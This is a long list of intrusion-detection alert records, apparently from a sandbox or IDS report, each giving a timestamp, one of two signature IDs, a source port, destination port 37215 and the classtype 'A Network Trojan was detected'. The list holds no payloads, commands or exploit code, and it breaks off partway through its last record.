          Timestamp:05/28/24-14:46:58.318838
          SID:2835222
          Source Port:56300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146047
          SID:2829579
          Source Port:35610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115378
          SID:2835222
          Source Port:57362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202742
          SID:2835222
          Source Port:52130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977106
          SID:2835222
          Source Port:36878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708259
          SID:2835222
          Source Port:40174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774685
          SID:2829579
          Source Port:49836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.475400
          SID:2835222
          Source Port:55232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.062874
          SID:2835222
          Source Port:41470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154046
          SID:2835222
          Source Port:46838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305493
          SID:2829579
          Source Port:34936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300223
          SID:2829579
          Source Port:43010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272833
          SID:2835222
          Source Port:54198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963749
          SID:2829579
          Source Port:34182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173653
          SID:2835222
          Source Port:41862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815516
          SID:2829579
          Source Port:43542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605102
          SID:2835222
          Source Port:51470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270851
          SID:2829579
          Source Port:43440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976432
          SID:2835222
          Source Port:33444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724567
          SID:2829579
          Source Port:44078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807132
          SID:2829579
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.326363
          SID:2829579
          Source Port:46790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978248
          SID:2835222
          Source Port:43382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592174
          SID:2829579
          Source Port:39418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511387
          SID:2835222
          Source Port:44758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730259
          SID:2829579
          Source Port:49752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.093075
          SID:2829579
          Source Port:41612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822608
          SID:2829579
          Source Port:34604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154059
          SID:2835222
          Source Port:42698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.077172
          SID:2829579
          Source Port:46236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202734
          SID:2835222
          Source Port:40924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061113
          SID:2829579
          Source Port:57560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551556
          SID:2835222
          Source Port:54642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325784
          SID:2829579
          Source Port:45538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465154
          SID:2829579
          Source Port:49166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041455
          SID:2829579
          Source Port:36998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678125
          SID:2835222
          Source Port:36172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267611
          SID:2835222
          Source Port:42352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295269
          SID:2829579
          Source Port:50566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735497
          SID:2829579
          Source Port:58630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.810411
          SID:2835222
          Source Port:48980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.288308
          SID:2835222
          Source Port:41350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325772
          SID:2829579
          Source Port:41532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622218
          SID:2835222
          Source Port:58212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213496
          SID:2835222
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336700
          SID:2829579
          Source Port:52558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317228
          SID:2835222
          Source Port:60162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738331
          SID:2829579
          Source Port:33650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125779
          SID:2835222
          Source Port:49698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669468
          SID:2829579
          Source Port:39980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668745
          SID:2835222
          Source Port:47004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115619
          SID:2829579
          Source Port:59884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324227
          SID:2835222
          Source Port:60922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488731
          SID:2835222
          Source Port:44058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855959
          SID:2829579
          Source Port:50790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732821
          SID:2829579
          Source Port:43052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270547
          SID:2835222
          Source Port:41850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847014
          SID:2829579
          Source Port:56026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140131
          SID:2835222
          Source Port:48626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114305
          SID:2829579
          Source Port:47076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181629
          SID:2835222
          Source Port:58936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.113129
          SID:2829579
          Source Port:55126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191958
          SID:2835222
          Source Port:51890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210741
          SID:2835222
          Source Port:52666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528808
          SID:2829579
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350097
          SID:2835222
          Source Port:38546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602488
          SID:2835222
          Source Port:34554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223177
          SID:2829579
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291749
          SID:2829579
          Source Port:49042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923987
          SID:2835222
          Source Port:56542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159294
          SID:2829579
          Source Port:46096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214676
          SID:2835222
          Source Port:42010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269302
          SID:2835222
          Source Port:41136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805531
          SID:2835222
          Source Port:41366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983556
          SID:2835222
          Source Port:60090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.774277
          SID:2829579
          Source Port:37142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358083
          SID:2835222
          Source Port:35704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953885
          SID:2835222
          Source Port:51768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722362
          SID:2829579
          Source Port:54186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483219
          SID:2835222
          Source Port:40058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669492
          SID:2835222
          Source Port:45274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324090
          SID:2835222
          Source Port:60758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401586
          SID:2829579
          Source Port:52462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126486
          SID:2835222
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.801834
          SID:2835222
          Source Port:45000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322769
          SID:2829579
          Source Port:41682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225989
          SID:2829579
          Source Port:52528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182203
          SID:2829579
          Source Port:40038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772181
          SID:2835222
          Source Port:36426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656657
          SID:2829579
          Source Port:55218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202175
          SID:2835222
          Source Port:39816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.751576
          SID:2829579
          Source Port:58204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065387
          SID:2829579
          Source Port:50532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859059
          SID:2835222
          Source Port:55238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358070
          SID:2835222
          Source Port:41590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266464
          SID:2835222
          Source Port:41910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497449
          SID:2829579
          Source Port:42642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317053
          SID:2835222
          Source Port:45198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704070
          SID:2835222
          Source Port:34692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711410
          SID:2829579
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742419
          SID:2835222
          Source Port:35240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.561988
          SID:2835222
          Source Port:56914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222787
          SID:2829579
          Source Port:34528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402590
          SID:2829579
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.668567
          SID:2835222
          Source Port:46158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781074
          SID:2829579
          Source Port:36836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196631
          SID:2835222
          Source Port:50694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.064875
          SID:2829579
          Source Port:54706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988984
          SID:2835222
          Source Port:45802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268834
          SID:2835222
          Source Port:54850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598762
          SID:2829579
          Source Port:35766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125586
          SID:2829579
          Source Port:57046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713308
          SID:2829579
          Source Port:41020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083471
          SID:2829579
          Source Port:36480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960287
          SID:2835222
          Source Port:57910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728951
          SID:2829579
          Source Port:55380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590535
          SID:2835222
          Source Port:41214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300994
          SID:2835222
          Source Port:53996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371465
          SID:2835222
          Source Port:53692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800702
          SID:2835222
          Source Port:53302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475915
          SID:2829579
          Source Port:57222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.700444
          SID:2829579
          Source Port:55800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551776
          SID:2835222
          Source Port:56014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922970
          SID:2835222
          Source Port:51618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.425809
          SID:2829579
          Source Port:48668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809938
          SID:2835222
          Source Port:50944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.890365
          SID:2829579
          Source Port:38826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093747
          SID:2829579
          Source Port:59010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.701222
          SID:2835222
          Source Port:60916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591323
          SID:2829579
          Source Port:43456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103273
          SID:2829579
          Source Port:58182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907855
          SID:2829579
          Source Port:55304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744550
          SID:2829579
          Source Port:54740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324593
          SID:2829579
          Source Port:46906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770565
          SID:2829579
          Source Port:45432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325422
          SID:2835222
          Source Port:57668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473614
          SID:2829579
          Source Port:50982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195387
          SID:2829579
          Source Port:58290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597741
          SID:2829579
          Source Port:44526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665393
          SID:2835222
          Source Port:43984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850528
          SID:2829579
          Source Port:34008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491263
          SID:2835222
          Source Port:35430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248893
          SID:2829579
          Source Port:50214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889876
          SID:2835222
          Source Port:54998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652956
          SID:2829579
          Source Port:45590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062033
          SID:2829579
          Source Port:43188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.232770
          SID:2835222
          Source Port:58928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051039
          SID:2835222
          Source Port:37984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588721
          SID:2835222
          Source Port:56738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298071
          SID:2829579
          Source Port:40514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146169
          SID:2835222
          Source Port:43192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511229
          SID:2829579
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774812
          SID:2829579
          Source Port:48560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138236
          SID:2829579
          Source Port:57284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594230
          SID:2835222
          Source Port:38054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226497
          SID:2829579
          Source Port:38996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543165
          SID:2829579
          Source Port:36510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103273
          SID:2835222
          Source Port:37178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341127
          SID:2829579
          Source Port:51334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277624
          SID:2835222
          Source Port:48118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151890
          SID:2829579
          Source Port:34962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474392
          SID:2829579
          Source Port:39752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536269
          SID:2835222
          Source Port:38588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922535
          SID:2829579
          Source Port:49660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958428
          SID:2835222
          Source Port:46594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339956
          SID:2835222
          Source Port:52004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650976
          SID:2829579
          Source Port:39386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297289
          SID:2829579
          Source Port:42206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299033
          SID:2829579
          Source Port:33570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102736
          SID:2835222
          Source Port:45132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979042
          SID:2829579
          Source Port:38358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874208
          SID:2829579
          Source Port:46508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325949
          SID:2835222
          Source Port:39580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528922
          SID:2835222
          Source Port:43042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084466
          SID:2835222
          Source Port:34570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.331559
          SID:2835222
          Source Port:38660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650595
          SID:2835222
          Source Port:55862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.113253
          SID:2829579
          Source Port:38898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840058
          SID:2829579
          Source Port:48394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487560
          SID:2829579
          Source Port:33462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267191
          SID:2829579
          Source Port:49164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293871
          SID:2829579
          Source Port:40790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.137710
          SID:2829579
          Source Port:37708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944027
          SID:2835222
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332630
          SID:2835222
          Source Port:48676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.246434
          SID:2829579
          Source Port:52976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298516
          SID:2835222
          Source Port:47818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744268
          SID:2835222
          Source Port:49706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684336
          SID:2829579
          Source Port:53730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.920050
          SID:2835222
          Source Port:54464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890019
          SID:2829579
          Source Port:55596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864639
          SID:2835222
          Source Port:35674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273185
          SID:2829579
          Source Port:36686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960677
          SID:2835222
          Source Port:54706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.320954
          SID:2835222
          Source Port:43736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665631
          SID:2835222
          Source Port:50712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229122
          SID:2835222
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298924
